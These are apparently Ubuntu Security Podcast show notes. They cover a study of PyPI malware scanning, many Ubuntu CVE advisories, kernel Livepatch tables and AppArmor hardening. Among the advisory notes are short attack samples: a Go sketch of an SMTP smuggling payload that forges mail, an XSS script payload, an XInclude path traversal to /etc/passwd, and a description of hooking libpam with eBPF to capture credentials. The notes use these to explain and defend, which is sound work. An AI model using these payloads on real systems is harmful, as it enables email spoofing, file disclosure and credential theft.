These attacks can be mitigated by implementing techniques such as multi-factor authentication, software signing, update frameworks, or reproducible builds, but the most widespread method is malware analysis.
Some engines check for anomalies via static and dynamic heuristics, while others rely on signatures due to their simplicity. Once a piece of software is detected as malicious, its hash is added to a deny list that is embedded in the anti-malware engine. Each file is then hashed and the result is checked against the deny list. If the heuristics or the hash comparison identifies the file as malicious, it is either reported, blocked, or deleted depending on the strategy implemented by the anti-malware engine.
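A minimal Go sketch of that hash-based deny-list check (the digest and file name below are placeholders):

package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"os"
)

// known-malicious SHA-256 digests; a real engine ships millions of these
var denyList = map[string]bool{
	"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855": true, // placeholder digest
}

func isKnownMalware(path string) (bool, error) {
	f, err := os.Open(path)
	if err != nil {
		return false, err
	}
	defer f.Close()
	h := sha256.New()
	if _, err := io.Copy(h, f); err != nil {
		return false, err
	}
	return denyList[hex.EncodeToString(h.Sum(nil))], nil
}

func main() {
	hit, err := isKnownMalware("package.tar.gz") // hypothetical artifact
	if err == nil {
		fmt.Println("malicious:", hit)
	}
}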
These solutions are already implemented in software repositories. In the case of PyPi, malware scanning was introduced in February 2020 with the assistance of a malware check feature in Warehouse, the application serving PyPi. However, it was disabled by the administrators two years later and ultimately removed in May 2023 due to an overload of alerts.
In addition to this technical solution, PyPi also capitalises on a form of social symbiosis. Software security companies and individuals conduct security research, reporting any discovered malware to the PyPi administrators via email. The administrators typically allocate 20 minutes per week to review these malware reports and remove any packages that can be verified as true positives. Ultimately, the reporting companies and individuals gain reputation or attention for their brands, products, and services.
In addition to information about software repositories, supply chain attacks, malware analysis, and PyPi, the researchers also interviewed administrators from PyPi to understand their requirements for a malware analysis tool that could assist them. The three interviews, each lasting one hour, were conducted in July and August 2022 and involved only three individuals. This limited number of interviews is due to the focus on the PyPi ecosystem, where only ten people are directly involved in malware scanning activities.
When discussing requirements, the administrators desired tools with a binary outcome, which could be determined by checking if a numerical score exceeds a threshold or not. The decision should also be supported by arguments. While administrators can tolerate false negatives, they aim to reduce the rate of false positives to zero. The tool should also operate on limited resources and be easy to adopt, use and maintain.
But do the current solutions tick these boxes?
The researchers selected tools based on a set of criteria: analysing the code of the packages, having public detection techniques, and detection rules. Upon examining the available solutions, they found that only three could be used for evaluation in the context of their research: PyPi’s malware checks, Bandit4Mal, and OSSGadget’s OSS Detect Backdoor.
Regarding the first, it should be noted that the researchers matched the YARA rules not only against the setup files, but against all files in the Python package. The second, Bandit4Mal, is an open-source version of Bandit that has been adapted to include multiple rules for detecting malicious patterns in the AST generated from a program's codebase. The last, OSSGadget's OSS Detect Backdoor, is a tool developed by Microsoft in June 2020 to perform rule-based malware detection on each file in a package.
These tools were tested against both malicious and benign Python packages. The researchers used two datasets containing 168 manually-selected malicious packages. For the benign packages, they selected 1,400 popular packages and one thousand randomly-selected benign Python packages.
For the evaluation process, they considered an alert in a malicious package to be a true positive and an alert in a benign package to be a false positive.
The true positive rate was 85% for the PyPi checks, the same for OSS Detect Backdoor and 90% for Bandit4Mal. The false positive rates ranged from 15% for the PyPi checks over the random packages, to 80% for Bandit4Mal on popular packages.
The tools ran in a time-effective manner, with a median time of around two seconds per package across all datasets. The maximum runtime was recorded for Ansible’s package, which was scanned in 26 minutes.
Despite their efficient run times, we can infer from these results that the tools are not accurate enough to meet the demands of PyPi’s administrators. The analysts may be overwhelmed by alerts for benign packages, which could interfere with their other operations.
And with this, we can conclude the episode of the Ubuntu Security Podcast, which details the paper “Bad Snakes: Understanding and Improving Python Package Index Malware Scanning”. We have discussed software repositories, malware analysis, and malware-related operations within PyPi. We’ve also explored the requirements that would make a new open-source Python malware scanner suitable for the PyPi administrators and evaluated how the current solutions perform.
If you come across any interesting topics that you believe should be discussed, please email us at [email protected].
Over to you, Alex!
The Linux kernel.org CNA has assigned their first CVEs so we revisit this topic to assess the initial impact on Ubuntu and the CVE ecosystem, plus we cover security updates for Roundcube Webmail, less, GNU binutils and the Linux kernel itself.
64 unique CVEs addressed
/etc/modprobe.d/blacklist-rare-network.conf
# appletalk
alias net-pf-5 off
Roundcube would take link references like [1] and linkify them to the source - if an attacker used a form like [<script>evil</script>] this would be included in the generated HTML without escaping and so could get arbitrary XSS
REFRESH MATERIALIZED VIEW CONCURRENTLY commands should drop privileges so that the SQL is executed as the owner of the materialized view - as such, if an attacker could get a user or automated system to run such a command they could possibly execute arbitrary SQL as the user rather than as the owner of the view as expected
less: mishandling of LESSCLOSE could then get arbitrary shell commands - this env var tells less to invoke a particular command as an input post-processor (it is used in conjunction with LESSOPEN to pre-process the file before it is displayed by less - for instance, if you wanted to use less to page through a HTML file you might perhaps use this to run it via html2text first - then use LESSCLOSE to do any cleanup)
An example of the kernel CNA's assignments so far: CVE-2023-52433: netfilter: nft_set_rbtree: skip sync GC for new elements in this transaction - as of Fri 01 Mar 2024 04:04:26 UTC they have assigned 288 CVEs
This week the Linux kernel project announced they will be assigning their own CVEs so we discuss the possible implications and fallout from such a shift, plus we cover vulnerabilities in the kernel, Glance_store, WebKitGTK, Bind and more.
64 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 100.1 | 100.1 | 100.1 | 100.1 | — |
aws-5.15 | — | 100.1 | — | — | — |
aws-5.4 | — | — | 100.1 | — | — |
aws-6.2 | 100.1 | — | — | — | — |
aws-hwe | — | — | — | 100.1 | — |
azure | 100.1 | 100.1 | — | 100.1 | — |
azure-4.15 | — | — | 100.1 | — | — |
azure-5.4 | — | — | 100.1 | — | — |
azure-6.2 | 100.1 | — | — | — | — |
gcp | 100.1 | 100.1 | — | 100.1 | — |
gcp-4.15 | — | — | 100.1 | — | — |
gcp-5.15 | — | 100.1 | — | — | — |
gcp-5.4 | — | — | 100.1 | — | — |
gcp-6.2 | 100.1 | — | — | — | — |
generic-4.15 | — | — | 100.1 | 100.1 | — |
generic-4.4 | — | — | — | 100.1 | 100.1 |
generic-5.15 | — | 100.1 | — | — | — |
generic-5.4 | — | 100.1 | 100.1 | — | — |
gke | 100.1 | 100.1 | — | — | — |
gke-5.15 | — | 100.1 | — | — | — |
gkeop | — | 100.1 | — | — | — |
hwe-6.2 | 100.1 | — | — | — | — |
ibm | 100.1 | 100.1 | — | — | — |
ibm-5.15 | — | 100.1 | — | — | — |
linux | 100.1 | — | — | — | — |
lowlatency-4.15 | — | — | 100.1 | 100.1 | — |
lowlatency-4.4 | — | — | — | 100.1 | 100.1 |
lowlatency-5.15 | — | 100.1 | — | — | — |
lowlatency-5.4 | — | 100.1 | 100.1 | — | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
Glance_store could log the S3 access_key if logging is configured at DEBUG level - any user then able to read the logs could see the access key and hence potentially get access to the S3 bucket (they would also need the secret key too, and this was never logged, so the impact is minimal)
Earlier this week, Greg Kroah-Hartman (one of the more famous Linux kernel developers - responsible for the various stable kernel trees / releases plus various subsystems within the kernel - he also wrote one of the most popular books on Linux kernel driver development, even if it is woefully outdated nowadays) announced that the Linux kernel project itself has been accepted as a CNA by MITRE and would start issuing CVEs for vulnerabilities found within the kernel itself.
Historically the upstream kernel developers and Greg himself have been quite disparaging of the CVE process / ecosystem, essentially saying that CVEs for the kernel are meaningless: all bugs are potentially security issues, and there are so many fixes going into the kernel whose security impact is not clear that the only way to stay secure is to track one of the supported upstream stable kernel trees - otherwise CVEs would have to be issued for basically every commit that goes into one of the stable trees.
It was not then surprising to see that in the initial announcement there was a statement that:
Note, due to the layer at which the Linux kernel is in a system, almost any bug might be exploitable to compromise the security of the kernel, but the possibility of exploitation is often not evident when the bug is fixed. Because of this, the CVE assignment team is overly cautious and assign CVE numbers to any bugfix that they identify.
This led many (including us) to fear that the kernel CNA would be issuing an extremely high volume of CVEs which would effectively overwhelm the CVE process and make it unworkable - for instance, LWN calculated that the 6.1 stable kernel has had over 12,000 fixes applied to it over the past year. So this leaves huge scope for many CVEs to possibly be assigned - as a comparison, in total across all software / hardware devices etc in 2023 there were 29,000 CVEs assigned. So the kernel itself could possibly become responsible for at least a quarter of all CVEs in the future.
Greg has some prior form in this space as well since in 2019 he gave a talk where he suggested one way the kernel community could help fix the issue of CVEs being erroneously assigned against the kernel would be to start doing exactly this and assigning a CVE for every fix applied to the kernel and hence overwhelm the CVE ecosystem to (in his words) “burn it down”.
Also the GSD project (Global Security Database - set up as an alternate / competitor to CVE) was doing exactly this - tracking a huge number of fixes for the stable trees and assigning them GSD IDs - as per https://osv.dev/list?ecosystem=Linux it tracks 13573 issues
Thankfully though, this plan seems to have moderated over the past few days - after Greg posted a patch set to the LKML documenting the process, he clarified in a follow-up email that this would not be the case, and instead that CVEs will only be assigned for commits which appear to have a security-relevant impact. How they actually do that remains to be seen, and his comment that "we (will) know it when we see it" doesn't exactly put me at ease (since it is very easy to miss the security implications of any particular commit), but at least this helps allay the fears that there would be a tidal wave of CVEs being assigned.
One outstanding issue which I directly asked Greg about is how they are actually tracking fixes for CVEs - since in their model, a CVE is equivalent to the commit which fixes the issue - however for lots of existing kernel CVEs that get assigned by other CNAs like Canonical or Red Hat etc, the fix comprises multiple commits
Greg says the whole process is quite complex and whilst their existing scripts want a one-to-one mapping from CVEs to commits they do plan to fix this in the future.
So it will be interesting to see what things they end up assigning CVEs for. It will also be interesting to see how the interaction with security researchers plays out. Since their process is heavily skewed to the CVE corresponding to the fix commit AND they state that this must be in one of the stable trees for a CVE to be assigned, it doesn't leave a lot of room for responsible disclosure. They do say they can assign a CVE for an issue before it is resolved with a commit to one of the stable trees, but ideally these details would get disclosed to distros and others ahead of the CVE details being released to the public. I also asked Greg about this but am awaiting a response.
AppArmor unprivileged user namespace restrictions are back on the agenda this week as we survey the latest improvements to this hardening feature in the upcoming Ubuntu 24.04 LTS, plus we discuss SMTP smuggling in Postfix, runC container escapes and Qualys’ recent disclosure of a privilege escalation exploit for GNU libc and more.
39 unique CVEs addressed
The end-of-data sequence <CR><LF>.<CR><LF> gets interpreted loosely, so it is possible to include extra SMTP commands within the message data which would then go on to be interpreted as additional SMTP commands to be executed by the receiving server, causing it to receive two emails when only one was sent in the first place - and where the usual SPF checks get bypassed for this second email - so SPF/DMARC policies can be bypassed to spoof emails from various domains
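To make the primitive concrete, a sketch of a smuggled DATA payload (addresses are placeholders; the exact non-standard terminator that slips through differs per server pair, which is the crux of the technique):

// Embed a bare <LF>.<LF> inside the message body: a strict forwarding
// server that only treats <CR><LF>.<CR><LF> as end-of-data passes it
// through, while a lenient receiver ends the first message there and
// parses the rest as new SMTP commands.
package main

import "fmt"

func main() {
	payload := "Subject: legitimate\r\n\r\n" +
		"hello\n" +
		".\n" + // smuggled end-of-data for a lenient receiver
		"MAIL FROM:<ceo@victim.example>\r\n" + // placeholder addresses
		"RCPT TO:<staff@victim.example>\r\n" +
		"DATA\r\n" +
		"Subject: smuggled\r\n\r\nforged message\r\n" +
		".\r\n" // the real end-of-data seen by both servers
	fmt.Print(payload)
}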
glibc's syslog() formats argv[0] in a call to snprintf() into a fixed-size buffer allocated on the stack - snprintf() won't overflow this but will return a value larger than the fixed-size buffer - as a result a heap buffer to then contain this string would only get allocated with a size of 1 byte, but then the full expected data would get copied into it - and since the attacker controls this value they can write arbitrary data to the heap by just using a crafted program name (which is easy to do via the exec command built in to bash etc)
setuid binaries like /usr/bin/su call syslog() internally and so can be abused in this way
Django's intcomma template filter
Unprivileged user namespaces allow an otherwise unprivileged user to gain CAP_NET_ADMIN within that namespace and so create firewall rules etc that only affect applications within that namespace and not the host system
With the restrictions enabled, unless a profile grants the needed capabilities (CAP_NET_ADMIN etc as mentioned before) this is then denied
The updated apparmor package is in the noble-proposed pocket
For the first episode of 2024 we take a look at the case of a raft of bogus FOSS CVEs reported on full-disclosure as well as AppSec tools in Ubuntu and the EOL announcement for 23.04, plus we cover vulnerabilities in the Linux kernel, Puma, Paramiko and more.
81 unique CVEs addressed
Requires CAP_NET_ADMIN to be able to exploit (ie to create a netfilter chain etc) but this can easily be obtained in an unprivileged user namespace -> privesc for an unprivileged local user
An attacker can strip the EXT_INFO message which is sent during the handshake to negotiate various protocol extensions, in a way that neither the client nor server will notice (since they can just send an empty ignored packet with the same sequence number). This can be done quite easily by an attacker since during this stage of the connection there is no encryption in place. The end result is the attacker can cause either a loss of integrity (since this won't be detected by the other party) or potentially compromise the key exchange itself and hence cause a loss of confidentiality as well
For the final episode of 2023 we discuss creating PoCs for vulns in tar and the looming EOL for Ubuntu 23.04, plus we look into security updates for curl, BlueZ, Netatalk, GNOME Settings and a heap more.
57 unique CVEs addressed
The Public Suffix List exists because domains may be registered not just under .com / .org but also under .co.uk etc - there is no good algorithmic way of determining the highest level at which a domain may be registered for a particular TLD as each registrar is different
curl: a cookie could be set with domain=co.UK with a URL of say curl.co.uk and this would then get sent to every other .co.uk domain, contrary to the expectations of the PSL which lists .co.uk as a PSL domain
The vmware-user-suid wrapper - a local user with non-root privileges that is able to hijack the /dev/uinput file descriptor may be able to simulate user inputs
BlueZ: fixed by setting ClassicBondedOnly=true - this may break some legacy input devices like the PS3 controller - in which case, edit /etc/bluetooth/input.conf and set this back to false, but then beware that you may be vulnerable to attack from anyone within bluetooth range when your machine is discoverable - ie. the bluetooth settings panel is open
An earlier fix involving getaddrinfo() was possible to still trigger
1 CVE addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
Stack buffer overflow on parsing a tar archive with an extremely large extended attribute name/value - the PAX archive format allows storing extended attributes - on the kernel's VFS layer these are limited to 255 bytes for the name and 64kB for the value - but in a tar archive these can be basically arbitrary
When processing the archive, tar would allocate space for these on the stack - BUT the stack is limited to a maximum size of 8MB normally - so if you can specify an xattr name of more than 8MB you can overflow the entire stack memory region - then into guard pages or even beyond, triggering a segfault or at worst a heap corruption and hence possible RCE -> but in Ubuntu we have enabled stack clash protection since 19.10 - which turns this into a DoS only
$ hardening-check $(which tar)
/usr/bin/tar:
Position Independent Executable: yes
Stack protected: yes
Fortify Source functions: yes (some protected functions found)
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: yes
Control flow integrity: yes
Speaking from experience, it is not easy to create such an archive - either through a real xattr on disk or through specifying one on the command-line (since you can specify arbitrary attributes to be stored for files when adding them to an archive, but then you hit the maximum limit of command-line arguments) BUT it is possible - in my case I did it by using sed to replace the contents of an xattr name in an existing archive with a crafted one and then doing a bunch of other hacks to fix up all the metadata of the tar archive to match - helpfully, all these attributes in the archive are stored as NUL-terminated strings, so you can simply use sed to fix them all up assuming you can calculate the correct values
Fixed by instead allocating these on the heap which does not have the same arbitrary limitation as the stack
GNU binutils tools like objdump etc
Python's os.path.normpath(): a path with an embedded NUL would get truncated at the NUL byte - fixed to remove this behaviour
Mark Esler is our special guest on the podcast this week to discuss the OpenSSF's Compiler Options Hardening Guide for C/C++ plus we cover vulnerabilities and updates for GIMP, FreeRDP, GStreamer, HAProxy and more.
65 unique CVEs addressed
HAProxy: a request for index.html#.png could get routed to a static server (since HAProxy is usually configured to route .png to a static server, but in this case the request is really for index.html)
This week we take a deep dive into the Reptar vuln in Intel processors plus we look into some relic vulnerabilities in Squid and OpenZFS and finally we detail new hardening measures in tracker-miners to keep your desktop safer.
115 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 99.2 | 99.1 | 99.1 | 99.1 | — |
aws-5.15 | — | 99.2 | — | — | — |
aws-5.4 | — | — | 99.1 | — | — |
aws-6.2 | 99.2 | — | — | — | — |
aws-hwe | — | — | — | 99.1 | — |
azure | 99.2 | 99.1 | — | 99.1 | — |
azure-4.15 | — | — | 99.1 | — | — |
azure-5.4 | — | — | 99.1 | — | — |
azure-6.2 | 99.2 | — | — | — | — |
gcp | 99.2 | 99.1 | — | 99.1 | — |
gcp-4.15 | — | — | 99.1 | — | — |
gcp-5.15 | — | 99.2 | — | — | — |
gcp-5.4 | — | — | 99.1 | — | — |
gcp-6.2 | 99.2 | — | — | — | — |
generic-4.15 | — | — | 99.1 | 99.1 | — |
generic-4.4 | — | — | — | 99.1 | 99.1 |
generic-5.15 | — | 99.2 | — | — | — |
generic-5.4 | — | 99.1 | 99.1 | — | — |
gke | 99.2 | 99.1 | — | — | — |
gke-5.15 | — | 99.2 | — | — | — |
gkeop | — | 99.1 | — | — | — |
hwe-6.2 | 99.2 | — | — | — | — |
ibm | 99.2 | 99.1 | — | — | — |
ibm-5.15 | — | 99.2 | — | — | — |
ibm-5.4 | — | — | 99.1 | — | — |
linux | 99.2 | — | — | — | — |
lowlatency-4.15 | — | — | 99.1 | 99.1 | — |
lowlatency-4.4 | — | — | — | 99.1 | 99.1 |
lowlatency-5.15 | — | 99.2 | — | — | — |
lowlatency-5.4 | — | 99.1 | 99.1 | — | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
As we ease back into regular programming, we cover the various activities the team got up to over the past few weeks whilst away in Riga for the Ubuntu Summit and Ubuntu Engineering Sprint.
With the Ubuntu Summit just around the corner, we preview a couple talks by the Ubuntu Security team, plus we look at security updates for OpenSSL, Sofia-SIP, AOM, ncurses, the Linux kernel and more.
91 unique CVEs addressed
Checking DH keys or parameters with an excessively large prime (p parameter) value (over 10,000 bits) would take an excessive amount of time - fixed by checking this earlier and erroring out in that case; the q parameter could also be abused in the same way - since the size of this has to be less than p, it was fixed by just checking it against this
ncurses: infotocap
After a well-deserved break, we're back looking at the recent Ubuntu 23.10 release and the significant security technologies it introduces along with a call for testing of unprivileged user namespace restrictions, plus the details of security updates for curl, Samba, iperf3, CUE and more.
26 unique CVEs addressed
curl: an issue in the curl_easy_duphandle() function
Samba: handling of the %U directive in smb.conf - if you specified a path to be shared like /home/%U/FILES, the %U would seemingly be ignored and not replaced with the username as expected - and hence the share would fail - this same issue actually occurred previously in January this year - we have now added a regression test specifically to try and ensure we do not introduce this same issue in the future again
A length of MAX_UINT: adding 1 then wraps the integer around back to zero - and so no memory gets allocated - and when copying into the subsequent memory you get a buffer overflow
The hope is to get this enabled by default in 24.04 LTS - but we need as much testing as we can get to find anything else which is not working as expected beforehand - easy to do via a new sysctl:
sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=1
To make it persistent, configure it via /etc/sysctl.d, e.g. create a file /etc/sysctl.d/60-apparmor.conf with the following contents:
kernel.apparmor_restrict_unprivileged_userns = 1
Then if you do find something which is not working as expected, you can create a simple AppArmor profile which will allow it to use unprivileged user namespaces without any additional restrictions, e.g:
abi <abi/4.0>,
include <tunables/global>
/opt/google/chrome/chrome flags=(unconfined) {
userns,
# Site-specific additions and overrides. See local/README for details.
include if exists <local/opt.google.chrome.chrome>
}
Note that an application could work around the restriction by aa-exec'ing itself via such an unconfined profile - so you then also need to enable the kernel.apparmor_restrict_unprivileged_unconfined = 1 sysctl too
To report any issues found, run ubuntu-bug apparmor or visit https://bugs.launchpad.net/ubuntu/+source/apparmor/+filebug
It's the Linux Security Summit in Bilbao this week and we bring you some highlights from our favourite talks, plus we cover the 25 most stubborn software weaknesses, and we look at security updates for Open VM Tools, libwebp, Django, binutils, Indent, the Linux kernel and more.
88 unique CVEs addressed
A PostgreSQL vulnerability (escalation from CREATE privilege to being able to execute arbitrary code as a bootstrap superuser) also affected PostgreSQL 9.5 in Ubuntu 16.04
.xll files were missing from the standard blocklist that warns users when downloading executables - more of a Windows issue but these are Excel add-in files - ie. plugins for Excel; plus the usual "memory safety bugs"
The FILES_TMP_CONTENT variable
A crash in atftpd if requesting a non-existent file - turns out to be a buffer overflow so could possibly be used for code execution
CWE-ID | Description | 2023 Rank |
---|---|---|
CWE-787 | Out-of-bounds Write | 1 |
CWE-79 | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) | 2 |
CWE-89 | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) | 3 |
CWE-416 | Use After Free | 4 |
CWE-78 | Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) | 5 |
CWE-20 | Improper Input Validation | 6 |
CWE-125 | Out-of-bounds Read | 7 |
CWE-22 | Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) | 8 |
CWE-352 | Cross-Site Request Forgery (CSRF) | 9 |
CWE-476 | NULL Pointer Dereference | 12 |
CWE-287 | Improper Authentication | 13 |
CWE-190 | Integer Overflow or Wraparound | 14 |
CWE-502 | Deserialization of Untrusted Data | 15 |
CWE-119 | Improper Restriction of Operations within Bounds of a Memory Buffer | 17 |
CWE-798 | Use of Hard-coded Credentials | 18 |
Andrei is back this week with a deep dive into recent research around CVSS scoring inconsistencies, plus we look at a recent Ubuntu blog post on the internals of package updates and the repositories, and we cover security updates in Apache Shiro, GRUB2, CUPS, RedCloth, curl and more.
77 unique CVEs addressed
The CUPS-Get-Document operation could allow other users to fetch print documents without authentication
"Shedding Light on CVSS Scoring Inconsistencies: A User-Centric Study on Evaluating Widespread Security Vulnerabilities" - to appear in IEEE Symposium on Security & Privacy (aka S&P) in 2024
This week we detail the recently announced and long-awaited feature of TPM-backed full-disk encryption for the upcoming Ubuntu 23.10 release, plus we cover security updates for elfutils, GitPython, atftp, BusyBox, Docker Registry and more.
93 unique CVEs addressed
git clone
and doesn’t completely
validate the options and so leads to shell-command injection - thanks to
Sylvain Beucler from Debian LTS team for noticing this and pointing it out to
the upstream project
/etc/group
on the server but likely this is not
deterministic and would be whatever else was on the heap
free()
on malformed gzip data - on error, sets bit 1 of a pointer to
indicate that an error occurred - would then go and pass this pointer to
free()
but now the pointer is 1-byte past where it should be - so need to
unset this bit first
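As a rough sketch of that pointer-tagging pattern (hypothetical code, not BusyBox’s actual implementation) - the error flag lives in the low bit of the pointer and must be cleared before the pointer can be freed:
#include <stdint.h>
#include <stdlib.h>

#define ERR_BIT 0x1UL /* hypothetical flag: low bit marks "error occurred" */

static void *unpack(int fail)
{
    char *buf = malloc(64); /* real code would decompress into this buffer */
    if (buf && fail)
        return (void *)((uintptr_t)buf | ERR_BIT); /* tag the pointer */
    return buf;
}

int main(void)
{
    void *p = unpack(1);
    if ((uintptr_t)p & ERR_BIT) /* detect the error... */
        p = (void *)((uintptr_t)p & ~ERR_BIT); /* ...and untag before free() */
    free(p); /* now points at the real allocation again */
    return 0;
}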
snap recovery --show-keys
emergency.service unit is still enabled which allows the usual boot checks to be bypassed
This week we cover reports of “fake” CVEs and their impact on the FOSS security ecosystem, plus we look at security updates for PHP, Fast DDS, JOSE for C/C++, the Linux kernel, AMD Microcode and more.
83 unique CVEs addressed
clearcpuid=avx
on the kernel
command-line (but this will have a decent performance impact)
--retry-delay
command-line option - where
if you specify a really large value of seconds, cURL will multiply this by
1000 to convert it to ms and hence overflow
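A minimal sketch of this bug class (illustrative only, not cURL’s actual code) - the seconds-to-milliseconds conversion needs an overflow guard before multiplying:
#include <limits.h>
#include <stdio.h>

static long secs_to_ms(long secs)
{
    if (secs > LONG_MAX / 1000) { /* guard the multiplication first */
        fprintf(stderr, "retry delay too large - clamping\n");
        return LONG_MAX;
    }
    return secs * 1000;
}

int main(void)
{
    printf("%ld\n", secs_to_ms(10000000000000000L)); /* would wrap unguarded */
    return 0;
}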
This week we talk about HTTP Content-Length handling, intricacies of group management in container environments and making sure you check your return codes while covering vulns in HAProxy, Podman, Inetutils and more, plus we put a call out for input on using open source tools to secure your SDLC.
69 unique CVEs addressed
Content-Length
headers even when there was
content in the request (which violates
RFC 9110 - HTTP Semantics) - this
RFC explicitly says:If the message is forwarded by a downstream intermediary, a Content-Length field value that is inconsistent with the received message framing might cause a security failure due to request smuggling or response splitting. As a result, a sender MUST NOT forward a message with a Content-Length header field value that is known to be incorrect.
ubuntu@ubuntu:~$ groups
ubuntu sudo
pdftops
binary
setuid() / setgid() system calls used in ftpd/rshd/rlogin etc
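A minimal sketch of the fix pattern (the usual drop-privileges idiom, not Inetutils’ exact code) - if the return codes of setgid()/setuid() are ignored and the calls fail (e.g. due to RLIMIT_NPROC exhaustion), the process silently keeps running as root:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void drop_privileges(uid_t uid, gid_t gid)
{
    if (setgid(gid) != 0) { /* drop the group first, while still root */
        perror("setgid");
        exit(EXIT_FAILURE);
    }
    if (setuid(uid) != 0) { /* then drop the user */
        perror("setuid");
        exit(EXIT_FAILURE);
    }
}

int main(void)
{
    drop_privileges(65534, 65534); /* nobody/nogroup on many systems */
    puts("now running unprivileged");
    return 0;
}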
We’re back after unexpectedly going AWOL last week to bring you the latest in Ubuntu Security including the recently announced Downfall and GameOver(lay) vulnerabilities, plus we look at security updates for OpenSSH and GStreamer and we detail plans for using AppArmor to restrict the use of unprivileged user namespaces as an attack vector in future Ubuntu releases.
143 unique CVEs addressed
14 CVEs addressed in Jammy (22.04 LTS)
6.1 kernel
8 different high priority vulns - most mentioned previously - does include “GameOver(lay)” which we haven’t covered yet - reported by Wiz Research and is specific to Ubuntu kernels
OverlayFS is a union filesystem which allows multiple filesystems to be mounted at the same time, and presents a single unified view of the filesystems. In 2018 we introduced some changes to OverlayFS as SAUCE patches to handle extended attributes in overlayfs. Then in 2020 we backported commits to fix CVE-2021-3493 - in the process this also added support for extended attributes in OverlayFS so now there were two code paths, each using different implementations for extended attributes. One was protected against the vuln in CVE-2021-3493 whilst the other was not.
This new vulnerability exploits that same flaw in the unprotected implementation.
In this case, the vulnerability is in the handling of extended attributes in OverlayFS - it is possible to create a file with extended attributes which are not visible to the user, and then mount that file in a way which makes the extended attributes visible to the user
nosuid option, and then remounting it with the suid option. This allows the user to then execute arbitrary code as root. NOTE: requires the user to have CAP_SYS_ADMIN, but this is easy to obtain via unprivileged user namespaces.
Even more reason to keep pursuing the effort to restrict the use of unprivileged user namespaces in upcoming Ubuntu 23.10
gather_data_sampling=off
- this is useful for those who want to avoid the
performance hit, and are willing to accept the risk of the vulnerability.
This week we look at the recent Zenbleed vulnerability affecting some AMD processors, plus we cover security updates for the Linux kernel, a high profile OpenSSH vulnerability and finally Andrei is back with a deep dive into recent academic research around how to safeguard machine learning systems when used across distributed deployments.
123 unique CVEs addressed
/usr/lib
on
your local machine
ssh
wrmsr -a 0xc0011029 $(($(rdmsr -c 0xc0011029) | (1<<9)))
CAP_NET_ADMIN
to exploit - but can get this in an
unprivileged user namespace -> privesc
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | — | 96.2 | — | 96.2 | — |
aws-hwe | — | — | — | 96.2 | — |
azure | 96.3 | 96.2 | — | 96.2 | — |
azure-5.4 | — | — | 96.2 | — | — |
gcp | 96.3 | 96.2 | — | 96.2 | — |
gcp-4.15 | — | — | 96.2 | — | — |
gcp-5.15 | — | 96.3 | — | — | — |
gcp-5.4 | — | — | 96.2 | — | — |
generic-4.15 | — | — | 96.2 | 96.2 | — |
generic-4.4 | — | — | — | 96.2 | 96.2 |
generic-5.15 | — | 96.3 | — | — | — |
generic-5.4 | — | 96.2 | 96.2 | — | — |
gke | 96.3 | 96.2 | — | — | — |
gke-5.15 | — | 96.3 | — | — | — |
gke-5.4 | — | — | 96.2 | — | — |
gkeop | — | 96.2 | — | — | — |
gkeop-5.4 | — | — | 96.2 | — | — |
ibm | 96.3 | 96.2 | — | — | — |
ibm-5.4 | — | — | 96.2 | — | — |
linux | 96.3 | — | — | — | — |
lowlatency-4.15 | — | — | 96.2 | 96.2 | — |
lowlatency-4.4 | — | — | — | 96.2 | 96.2 |
lowlatency-5.15 | — | 96.3 | — | — | — |
lowlatency-5.4 | — | 96.2 | 96.2 | — | — |
include
element that specifies say <xi:include href=".?../../../../../../../../../../etc/passwd"/> - simple PoC provided by the upstream reporter
This week we talk about the dual use purposes of eBPF - both for security and for exploitation, and how you can keep your systems safe, plus we cover security updates for the Linux kernel, Ruby, SciPy, YAJL, ConnMan, curl and more.
80 unique CVEs addressed
io_uring
x*
as punycode names always start with xn--
/sys/kernel/debug/tracing/uprobe_events
but once done, allows to then
have a BPF program executed every time the specified function within a
specified library / binary is executed - so by hooking libpam can then log the
credentials used by any user when logging in / authenticating for sudo etc.
LD_PRELOAD
to hook into
the functions - but this requires that binaries get executed with this
environment set so is harder to achieve
.text section) to look for breakpoint opcode (0xCC) or it could look for the special memory mapping [uprobes] in /proc/self/maps
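A minimal sketch of that second self-check, assuming the [uprobes] mapping name shown above:
#include <stdio.h>
#include <string.h>

int main(void)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    if (!maps)
        return 1;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof(line), maps)) {
        if (strstr(line, "[uprobes]")) { /* kernel-inserted mapping */
            found = 1;
            break;
        }
    }
    fclose(maps);
    puts(found ? "uprobe detected" : "no uprobes mapped");
    return 0;
}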
/sys/kernel/debug/tracing/uprobe_events
-
which lists all the uretprobes currently in use on the system
We take a sneak peek at the upcoming AppArmor 4.0 release, plus we cover vulnerabilities in AccountsService, the Linux Kernel, ReportLab, GNU Screen, containerd and more.
50 unique CVEs addressed
~/.pam_environment
file
which is used to configure various per-user session environment variables -
this way no matter how you log in to a Ubuntu system, the locale etc that you
configured via g-c-c etc gets used
io_uring
subsystem - local attacker could use
this to trigger a deadlock and hence a DoS
INVLPG
instruction - but it was found that on certain hardware platforms this did not
actually flush the global TLB contrary to expectation - and so could leak
kernel memory back to userspace
io_uring
and TC flower plus OOB read in InfiniBand RDMA driver - DoS / info
leak
eval()
function
directly on value obtained from an XML document
eval()
without having to remove this functionality - new update disables this
by default and instead only allows a much more limited subset of colors to be parsed
apparmor_parser
